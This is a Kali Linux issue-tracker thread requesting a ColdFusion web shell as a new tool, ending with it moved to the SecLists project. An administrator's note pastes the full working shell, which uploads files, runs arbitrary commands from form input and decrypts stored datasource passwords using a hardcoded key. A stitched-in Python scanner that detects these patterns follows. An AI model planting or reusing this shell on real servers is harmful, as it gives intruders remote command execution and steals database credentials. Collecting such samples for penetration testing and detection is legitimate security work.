View Issue Details

ID: 0001002
Project: Kali Linux
Category: New Tool Requests
View Status: public
Last Update: 2020-03-25 13:26
Reporter: offsec_student1
Assigned To: g0tmi1k
Priority: normal
Severity: feature
Reproducibility: always
Status: closed
Resolution: no change required
Platform: x64
OS: Kali
OS Version: 1.0
Summary: 0001002: ColdFusion Shell Web Shell
Description

Found a ColdFusion WebShell that allows file uploads and file execution.

Successfully tested on ColdFusion 8

I didn't write the code but it can be found at:

http://pastebin.com/3HKGQCWF

Activities

g0tmi1k

2018-01-29 14:48

administrator   ~0008371

To help speed up the process of evaluating the tool, please make sure to include the following information (the more information you include, the more beneficial it will be for us):

  • [Name] - The name of the tool
  • [Version] - What version of the tool should be added?
    --- If it uses source control (such as git), please make sure there is a release to match (e.g. git tag)
  • [Homepage] - Where can the tool be found online? Where to go to get more information?
  • [Download] - Where to go to get the tool?
  • [Author] - Who made the tool?
  • [Licence] - How is the software distributed? What conditions does it come with?
  • [Description] - What is the tool about? What does it do?
  • [Dependencies] - What is needed for the tool to work?
  • [Similar tools] - What other tools are out there?
  • [How to install] - How do you compile it?
  • [How to use] - What are some basic commands/functions to demonstrate it?
g0tmi1k

2020-02-10 18:04

administrator   ~0012182

Pastebin has been deleted

https://web.archive.org/web/20170322222809/http://pastebin.com/3HKGQCWF

g0tmi1k

2020-02-10 18:04

administrator   ~0012183

<html>
<body>

<!-- orig author: kGrutzmacher  -->
<!-- additshonz: lawKnee        -->
<b>Notes:</b><br>
<ul>
<li>For Windows put this as command &quot;c:\windows\system32\cmd.exe /c&quot; or wherever cmd.exe is<br>
<li>For Windows options are the command you want to run &quot;dir&quot; &quot;type&quot; etc
</ul>
<p>

&lt;cfoutput>

&lt;cfif isDefined(&quot;fileUpload&quot;)>
  &lt;cffile action=&quot;upload&quot;
    fileField=&quot;fileUpload&quot;
    destination=&quot;C:\&quot;>
     <p>Your file has been uploaded.</p>
&lt;/cfif>
&lt;form enctype=&quot;multipart/form-data&quot; method=&quot;post&quot;>
&lt;input type=&quot;file&quot; name=&quot;fileUpload&quot; /><br />
&lt;input type=&quot;submit&quot; value=&quot;Upload File&quot; />
&lt;/form>

&lt;table>
&lt;form method=&quot;POST&quot; action=&quot;&quot;>
&lt;tr>&lt;td>Command:&lt;/td>&lt;td>&lt;input type=text name=&quot;cmd&quot; size=50
 &lt;cfif isdefined(&quot;form.cmd&quot;)>value=&quot;#form.cmd#&quot;&lt;/cfif>><br>&lt;/td>&lt;/tr>
&lt;tr>&lt;td>Options:&lt;/td>&lt;td> &lt;input type=text name=&quot;opts&quot; size=50
 &lt;cfif isdefined(&quot;form.opts&quot;)>value=&quot;#form.opts#&quot;&lt;/cfif>><br>&lt;/td>&lt;/tr>
&lt;tr>&lt;td>Timeout:&lt;/td>&lt;td> &lt;input type=text name=&quot;timeout&quot; size=4
 &lt;cfif isdefined(&quot;form.timeout&quot;)>value=&quot;#form.timeout#&quot;
 &lt;cfelse>value=&quot;5&quot;&lt;/cfif>>&lt;/td>&lt;/tr>
&lt;/table>
&lt;input type=submit value=&quot;Exec&quot; >
&lt;/form>

&lt;cfif isdefined(&quot;form.cmd&quot;)>
&lt;cfsavecontent variable=&quot;myVar&quot;>
&lt;cfexecute name = &quot;#Form.cmd#&quot;
  arguments = &quot;#Form.opts#&quot;
  timeout = &quot;#Form.timeout#&quot;>
&lt;/cfexecute>
&lt;/cfsavecontent>
<pre>
#HTMLCodeFormat(myVar)#
</pre>
&lt;/cfif>

&lt;cfscript>
//The following code borrowed from hernanOchoa @hexale (thx)  
//added better formatting on output and connection string [lb]

// Create Data Source Object
dataSourceObb=createobject(&quot;java&quot;,&quot;coldfusion.server.ServiceFactory&quot;).
        getDatasourceService().getDatasources();
        writeoutput(&quot;<br><br><b>Datasource Credentials:</b><br>&quot;);
        writeoutput(&quot;&lt;table>&quot;);
// Loop Through DataSources
for(i in dataSourceObb) {
        if(len(dataSourceObb[i][&quot;password&quot;])){

        // Get url
        theurl=(dataSourceObb[i][&quot;url&quot;]);

        // Get username
        username=(dataSourceObb[i][&quot;username&quot;]);

        // Get and decrypt password
        decryptPassword=Decrypt(dataSourceObb[i][&quot;password&quot;],
        generate3DesKey(&quot;0yJ!@1$r8p0L@r1$6yJ!@1rj&quot;), &quot;DESede&quot;,
     &quot;Base64&quot;);

        // Output datasource usernames, passwords, and urls
        writeoutput(&quot;&quot; &
        &quot;&lt;tr>&lt;td>DataSource: &quot; & i & &quot;&lt;/td>&quot; &
        &quot;&lt;td>Username: &quot; & username & &quot;&lt;/td>&quot; &
        &quot;&lt;td>Password: &quot; & decryptPassword &
        &quot;&lt;td>URL: &quot; & theurl & &quot;&lt;/td>&lt;/tr>&quot;);
        }
}
writeoutput(&quot;&lt;/table><br>&quot;);
&lt;/cfscript>
&lt;/cfoutput>
&lt;/body>
&lt;/html>
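
Added example, not part of the original issue or of the code posted in the note: a small static scanner that flags the three behaviours visible in that code (a cffile upload, cfexecute fed from request scope, and ServiceFactory datasource enumeration) in CFML source on a server. The rule names, function names and sample strings are constructed for illustration.

```python
import html
import re
from pathlib import Path

# Rule names are constructed for this example; each pattern targets one
# behaviour visible in the code posted in the note above.
RULES = {
    "cffile-upload": re.compile(
        r"<cffile\b[^>]*\baction\s*=\s*[\"']?upload", re.I),
    "cfexecute-from-request": re.compile(
        r"<cfexecute\b[^>]*#\s*(?:form|url|cgi)\.", re.I),
    "datasource-enumeration": re.compile(
        r"coldfusion\.server\.ServiceFactory[\s\S]{0,200}?getDatasourceService",
        re.I),
}
CFML_SUFFIXES = {".cfm", ".cfml", ".cfc"}


def scan_source(text):
    """Return sorted (line, rule) hits. Entities are decoded first so an
    HTML-escaped copy, like the one pasted in the note, is still caught."""
    decoded = html.unescape(text)
    hits = []
    for rule, pattern in RULES.items():
        for match in pattern.finditer(decoded):
            hits.append((decoded.count("\n", 0, match.start()) + 1, rule))
    return sorted(hits)


def scan_tree(root):
    """Scan every CFML file under root; return {path: hits} for flagged files."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in CFML_SUFFIXES:
            hits = scan_source(path.read_text(errors="replace"))
            if hits:
                findings[str(path)] = hits
    return findings


# Constructed samples: an escaped fragment shaped like the note, and a
# template that uses the same tags with fixed, non-request values.
SAMPLE_SUSPECT = (
    '&lt;cffile action=&quot;upload&quot; fileField=&quot;f&quot; destination=&quot;C:\\&quot;>\n'
    '&lt;cfexecute name = &quot;#Form.cmd#&quot;\n'
    '  arguments = &quot;#Form.opts#&quot;>\n'
    'ds = createobject(&quot;java&quot;,&quot;coldfusion.server.ServiceFactory&quot;).\n'
    '  getDatasourceService().getDatasources();\n'
)
SAMPLE_BENIGN = (
    '<cfexecute name="/usr/bin/uptime" timeout="5"></cfexecute>\n'
    '<cffile action="read" file="notes.txt" variable="t">\n'
)
```

A hit on cfexecute-from-request alone is enough to warrant review of the file; the other two rules also match legitimate administrative templates and are most useful in combination.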
g0tmi1k

2020-03-25 13:04

administrator   ~0012520

My gut says this would be better for the seclists project - will add it there :)

g0tmi1k

2020-03-25 13:26

administrator   ~0012537

https://github.com/danielmiessler/SecLists/pull/400

Issue History

Date Modified Username Field Change
2014-01-29 09:38 offsec_student1 New Issue
2018-01-29 14:48 g0tmi1k Note Added: 0008371
2018-02-21 09:35 g0tmi1k Product Version 1.0.4 =>
2019-12-09 13:30 g0tmi1k Severity minor => feature
2020-02-10 18:04 g0tmi1k Note Added: 0012182
2020-02-10 18:04 g0tmi1k Note Added: 0012183
2020-03-25 13:04 g0tmi1k Note Added: 0012520
2020-03-25 13:20 g0tmi1k Assigned To => g0tmi1k
2020-03-25 13:20 g0tmi1k Status new => closed
2020-03-25 13:20 g0tmi1k Resolution open => no change required
2020-03-25 13:26 g0tmi1k Note Added: 0012537